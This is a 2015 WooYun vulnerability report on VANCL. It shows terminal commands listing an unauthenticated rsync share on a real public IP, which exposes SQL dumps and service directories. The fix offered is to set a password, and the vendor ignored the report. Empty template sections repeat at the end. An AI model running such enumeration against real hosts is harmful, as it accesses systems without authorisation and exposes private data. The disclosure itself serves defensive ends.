凡客诚品配置不当信息泄漏 | wooyun-2015-0142293

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0142293

漏洞标题：

凡客诚品配置不当信息泄漏

漏洞详情

披露状态：

2015-09-20：细节已通知厂商并且等待厂商处理中
2015-09-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

书到用时方恨少，不会审计怎么好

详细说明：

root@kali:~/mark0smith/target# rsync 119.254.112.163::
dpcservice     	
root@kali:~/mark0smith/target# rsync 119.254.112.163::dpcservice
file has vanished: "/proc" (in dpcservice)
drwxr-xr-x          4,096 2015/08/30 20:27:54 .
-rw-r--r--    456,270,058 2015/08/30 04:03:08 file_move.sql
-rw-r--r--          1,333 2015/08/30 08:36:44 wechat.sql
drwxr-xr-x         28,672 2015/09/15 02:39:46 MobileService
drwxr-xr-x         16,384 2015/09/14 05:50:29 PushService
drwxr-xr-x          4,096 2015/08/28 03:59:51 VipCloud.Communication
drwxr-xr-x              0 2015/08/20 21:55:30 VipCloud.Job.Service
drwxr-xr-x              0 2015/08/20 21:45:47 VipCloud.Message.Service
drwxr-xr-x         20,480 2015/09/18 02:25:54 Vx520Service
dr-xr-xr-x              0 2015/09/19 09:26:56 cygdrive
drwxr-xr-x          8,192 2015/08/31 06:57:32 文件转移工具
rsync warning: some files vanished before they could be transferred (code 24) at main.c(1655) [generator=3.1.1]

漏洞证明：

修复方案：

加密码吧

版权声明：转载请注明来源 Mark0smith@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-09-25 21:38

厂商回复：

漏洞Rank：2 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Mark0smith@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Mark0smith@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞